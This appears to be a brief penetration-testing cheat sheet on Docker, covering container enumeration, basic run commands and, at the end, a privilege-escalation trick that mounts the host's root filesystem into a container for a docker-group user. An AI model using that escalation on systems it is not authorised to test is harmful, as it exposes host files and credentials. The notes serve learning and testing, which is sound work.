Docker

Enumeration

View running containers:

docker ps

find local docker images:

docker image ls

Check if we are inside a container by running (if the file exists we are inside a docker):

ls -la /.dockerenv

Run container

Run a container from the Alpine version 3.9 image, name the running container “web” and expose port 5000 externally, mapped to port 80 inside the container:

docker container run - is the new command.
docker run - is still the old one, which will be deprecated soon, I guess.

docker container run --name web -p 5000:80 alpine:3.9

List the running containers (add --all to include stopped containers)

docker container ls

Run docker in tty mode:

docker run -it debian:buster /bin/bash

-i, --interactive # attach stdin (interactive)

-t, --tty # pseudo-tty

Privilege escalation

If we have a user which is part of the docker group we can mount the file system to the docker and see all files

mount the file system:

docker run -v /:/hostOS -i -t [image name] bash

• -v /:/hostOS - mount the host’s / as /hostOS inside the image

• -i - interactive

• -t - create a tty

• [image name] - the name of the image to run, got from docker ps above

• bash - command to run